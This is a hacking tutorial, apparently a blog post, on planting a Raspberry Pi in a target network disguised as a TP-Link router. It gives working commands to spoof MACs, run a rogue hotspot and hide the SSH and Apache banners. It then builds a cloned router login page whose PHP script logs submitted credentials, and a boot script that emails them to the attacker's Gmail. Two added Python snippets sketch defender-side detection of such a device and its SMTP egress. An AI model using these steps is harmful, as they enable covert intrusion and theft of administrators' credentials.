Masking raspberry pi to look like and act like a router
This post continues the story of infiltrating a local network onsite with a Raspberry Pi (link).
When you infiltrate a serious network, where there is a good security team and the system admins do their job the right way, it is only a matter of time until they detect your hacking gadget. I mean, when a system admin performs a regular scan of the network and finds a new Raspberry Pi device, well, I think we can all imagine the expression on his face. So it is very smart to mask the Pi to look like something else: a printer, router, Windows PC, etc. This will definitely attract less attention.
In this post I will focus on how to mask the Raspberry Pi so it looks and acts like a router. In my case it will look like a TP-Link router. I will also create a phishing page imitating the router settings page, with the purpose of catching the admin's credentials in case he finds me and tries to log in. And I will also set it up so the harvested credentials are sent to my email.
For the purpose of this post I used a Raspberry Pi Zero W with two USB wifi antennas attached.
Here are brief steps we will focus on:
- MAC spoof of both antennas
- Creating of wifi hotspot (password protected and unprotected)
- Hiding of debian version on ssh protocol
- Changing of service name on port 80
- Creating of phishing page – router settings page
- Setting email to receive harvested credentials
1. MAC spoof
Change the MAC address of both antennas to a TP-Link Technologies address. Type the following commands (macchanger needs the interface name as its last argument):
ifconfig wlan1 down
macchanger -m f8:d1:11:2a:24:a3 wlan1
ifconfig wlan1 up
ifconfig wlan2 down
macchanger -m f8:d1:11:2a:24:a4 wlan2
ifconfig wlan2 up
service network-manager restart
Note: after a reboot the MAC address is restored to the original one, so the best way to keep the spoofed MAC address is to create a script that runs after each boot.
2. Creating wifi hotspot
You can create a password protected or an unprotected wifi hotspot. For the unprotected one I found a great tool on GitHub which is really easy to set up, while creating the password protected one is a little bit more time consuming.
2.1. Password unprotected wifi hotspot
git clone https://github.com/oblique/create_ap
cd create_ap
make install
systemctl start create_ap
create_ap wlan2 wlan1 MyAccessPoint
2.2. Password protected wifi hotspot
Download and install hostapd and dnsmasq.
sudo apt-get install hostapd
sudo apt-get install dnsmasq
service hostapd stop
service dnsmasq stop
Define the hotspot interface and the DHCP IP range in /etc/dnsmasq.conf.
interface=wlan2mon
dhcp-range=192.168.2.2,192.168.2.20,255.255.255.0,24h
Change the following settings in /etc/hostapd.conf. To define your wifi name change ssid, and to define the password change wpa_passphrase. Also be careful to set your own interface.
interface=wlan2mon
driver=nl80211
ssid=Wifi-name
hw_mode=g
channel=7
wmm_enabled=0
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=password
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
Note: To make my wifi hotspot work I needed to put my wifi adapter in monitor mode, otherwise it did not work. I did it with the following command.
airmon-ng start wlan2
You also need to tell to hostapd where the default configuration file is stored. Add the following lines in /etc/default/hostapd.
nano /etc/default/hostapd
DAEMON_CONF="/etc/hostapd.conf"
Now start up the services:
service hostapd start
service dnsmasq start
Now your hotspot is created but still does not provide you internet access. So, next you need to configure routing between both wifi adapters. In my case wlan1 is connected to the internet, while wlan2 is used for wifi hotspot.
Uncomment the next line to enable packet forwarding for IPv4 in /etc/sysctl.conf.
net.ipv4.ip_forward=1
Run the following command to activate forwarding:
sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
Turn the raspberry pi into the router:
iptables -t nat -A POSTROUTING -o wlan1 -j MASQUERADE
iptables -A FORWARD -i wlan1 -o wlan2mon -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i wlan2mon -o wlan1 -j ACCEPT
After that save the routing tables into the /etc/iptables.ipv4.nat:
sh -c "iptables-save > /etc/iptables.ipv4.nat"
The following line should restore the routing table whenever the Raspberry Pi is booted. But in my case it was not restored, because the restore at boot happened before wlan2 was put into monitor mode (wlan2mon), so that interface practically did not exist yet. Maybe in some circumstances it would work, if you figure out how to run the hotspot without monitor mode. However, here is the line which should be added to /etc/network/interfaces.
pre-up iptables-restore < /etc/iptables.ipv4.nat
Finally, you need to create a bash script which starts up your hotspot. In my case I created hotspot.sh.
#!/bin/bash
ifconfig wlan2mon 192.168.2.1
service dnsmasq restart
hostapd /etc/hostapd.conf
3. Changing of service name on port 22 and 80
For port 22 you should hide the Debian version in the SSH banner, so that the association between a router and a Debian distro does not look suspicious. To do this, add the following line to /etc/ssh/sshd_config.
DebianBanner no
Next, change the apache2 service name. Why should we change it? Well, when you scan a router it is not common to see an Apache service running on port 80. So in my case I changed it to TP-LINK WR841N WAP http config.
Install the following:
apt-get update
apt-get install libapache-mod-security
a2enmod mod-security
In the /etc/apache2/conf-enabled/security.conf add following line:
SecServerSignature "TP-LINK WR841N WAP http config"
Restart the apache2:
service apache2 restart
OK, let's scan the Raspberry Pi to see how convincing it looks.

Well, it looks convincing to me.
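The scan above shows what the attacker wants the admin to see. Seen from the defender's side, the same properties give the device away, so here is an added example (my code, not from the original post) that checks a host inventory for a device claiming a TP-Link identity while still carrying Linux and Apache fingerprints, and diffs the MACs seen now against a known-asset baseline. The host records and baseline are constructed sample data, and the assumption that a genuine TP-Link router presents neither an OpenSSH banner nor PHP response headers is mine.

```python
import re
from dataclasses import dataclass, field

# OUI the post spoofs (TP-Link Technologies); extend with your own vendor inventory.
TPLINK_OUIS = {"f8:d1:11"}
LINUX_SUFFIX = re.compile(r"Debian|Ubuntu|Raspbian")   # what "DebianBanner no" hides

@dataclass
class Host:
    ip: str
    mac: str
    ssh_banner: str = ""                    # e.g. "SSH-2.0-OpenSSH_7.9p1"
    http_server: str = ""                   # Server: header seen on port 80
    http_headers: dict = field(default_factory=dict)

def oui(mac):
    """First three octets of a MAC, normalised to lowercase."""
    return mac.lower()[:8]

def suspicious_findings(h):
    """Inconsistencies for a host that presents itself as a TP-Link router."""
    findings = []
    tplink_oui = oui(h.mac) in TPLINK_OUIS
    tplink_http = "tp-link" in h.http_server.lower()
    if not (tplink_oui or tplink_http):
        return findings                     # not claiming to be a router; out of scope
    # Assumption: a real consumer router does not run OpenSSH, so the banner alone is a flag.
    if h.ssh_banner.startswith("SSH-2.0-OpenSSH"):
        findings.append("OpenSSH banner on a device presenting as a TP-Link router")
    if LINUX_SUFFIX.search(h.ssh_banner):
        findings.append("Linux distribution suffix still present in SSH banner")
    if tplink_http and not tplink_oui:
        findings.append("TP-Link Server header but non-TP-Link OUI")
    # mod_security rewrites Server:, but PHP and Apache leave other headers behind.
    hdrs = {k.lower(): v for k, v in h.http_headers.items()}
    if "php" in hdrs.get("x-powered-by", "").lower() or "PHPSESSID" in hdrs.get("set-cookie", ""):
        findings.append("PHP response headers behind a router Server banner")
    return findings

def new_macs(baseline, seen):
    """Inventory diff: MACs seen now that are not in the known-asset baseline."""
    return sorted({m.lower() for m in seen} - {m.lower() for m in baseline})

# Constructed sample data: one genuine-looking router and one disguised Pi.
SAMPLE_HOSTS = [
    Host("192.168.1.1", "f8:d1:11:aa:bb:cc", "", "TP-LINK WR841N WAP http config"),
    Host("192.168.1.37", "f8:d1:11:2a:24:a3", "SSH-2.0-OpenSSH_7.9p1",
         "TP-LINK WR841N WAP http config", {"X-Powered-By": "PHP/7.3"}),
]
```

Run `suspicious_findings` over each host from your own scan results and pair it with `new_macs` against the asset register; two consecutive MACs from one vendor OUI appearing on the same day, as in this post, is exactly the pattern the diff surfaces.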
4. Creating of phishing page – router settings page
With the WebScrapBook plugin capture the page source and put it in /var/www/html.

After that modify the index.html file. You should modify it by adding/changing the action in the form part (action="action.php"). This runs action.php after the form is submitted on a login attempt.

Create the action.php file and save it in /var/www/html.
[php]
<?php
// Redirect the visitor to /error after the POST has been recorded.
$location = '/error';
header("Location: " . "http://" . $_SERVER['HTTP_HOST'] . $location);
// Append every submitted form field as name=value to pass.txt.
$handle = fopen("pass.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>
[/php]
So in this code you can see that after login it redirects you to the /error folder. In this folder you can create a new index.html file which renders e.g. "you have no authority to access this router". All harvested credentials are saved in the pass.txt file.

5. Setting email to receive harvested credentials
To receive the harvested credentials on your email (Gmail account) you can use ssmtp.
Install ssmtp:
apt-get install ssmtp
Then add the following lines to the configuration file /etc/ssmtp/ssmtp.conf. Change the AuthUser and AuthPass lines.
hostname=localhost
UseSTARTTLS=YES
[email protected]
mailhub=smtp.gmail.com:587
FromLineOverride=YES
[email protected]
AuthPass=Password
UseTLS=YES
Note: In the Gmail account settings you need to allow less secure apps to access your account.
Now you need to create a script and make it run on boot, which every 20 seconds checks whether the pass.txt file exists; if it exists, it greps the username and password from it and sends them to your Gmail account.
#!/usr/bin/bash
while sleep 20
do
if [ -f /var/www/html/pass.txt ]
then grep -e user -e pass /var/www/html/pass.txt | ssmtp [email protected]
rm -f /var/www/html/pass.txt
fi
done
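As an added defender-side counterpart to this exfiltration step (my code, not from the original post): a router has no reason to open an SMTP submission session to a public mail server itself, so an egress log line whose source MAC carries an infrastructure vendor OUI and whose destination port is 587, 465 or 25 is worth an alert. The CSV log format, the 192.168.0.0/16 internal range and the destination addresses are constructed assumptions.

```python
import csv
import io
import ipaddress

SMTP_PORTS = {25, 465, 587}
INFRA_OUIS = {"f8:d1:11"}                          # TP-Link OUI used in the post
INTERNAL = ipaddress.ip_network("192.168.0.0/16")  # assumption: the site's LAN range

# Constructed sample egress log (CSV), not real traffic. 203.0.113.25 stands in
# for a public mail submission server such as the smtp.gmail.com:587 the post uses;
# 3c:52:82:01:02:03 is a constructed workstation MAC with no infrastructure OUI.
SAMPLE_LOG = """ts,src_ip,src_mac,dst_ip,dst_port,proto
1700000000,192.168.1.37,f8:d1:11:2a:24:a3,203.0.113.25,587,tcp
1700000005,192.168.1.50,3c:52:82:01:02:03,203.0.113.25,587,tcp
1700000009,192.168.1.37,f8:d1:11:2a:24:a3,192.168.1.10,53,udp
1700000012,192.168.1.1,f8:d1:11:aa:bb:cc,203.0.113.53,53,udp
"""

def is_external(ip):
    """True when the destination lies outside the assumed internal range."""
    return ipaddress.ip_address(ip) not in INTERNAL

def smtp_from_infra(log_text):
    """Return (src_ip, src_mac, dst_ip, dst_port) for every outbound SMTP
    submission initiated by a device whose MAC claims an infrastructure OUI."""
    alerts = []
    for row in csv.DictReader(io.StringIO(log_text)):
        port = int(row["dst_port"])
        if (row["proto"] == "tcp" and port in SMTP_PORTS
                and row["src_mac"].lower()[:8] in INFRA_OUIS
                and is_external(row["dst_ip"])):
            alerts.append((row["src_ip"], row["src_mac"], row["dst_ip"], port))
    return alerts
```

The workstation's mail submission on the second line is deliberately not flagged; tune INFRA_OUIS and INTERNAL to your own inventory and this becomes a simple egress rule for any device class that should never send mail.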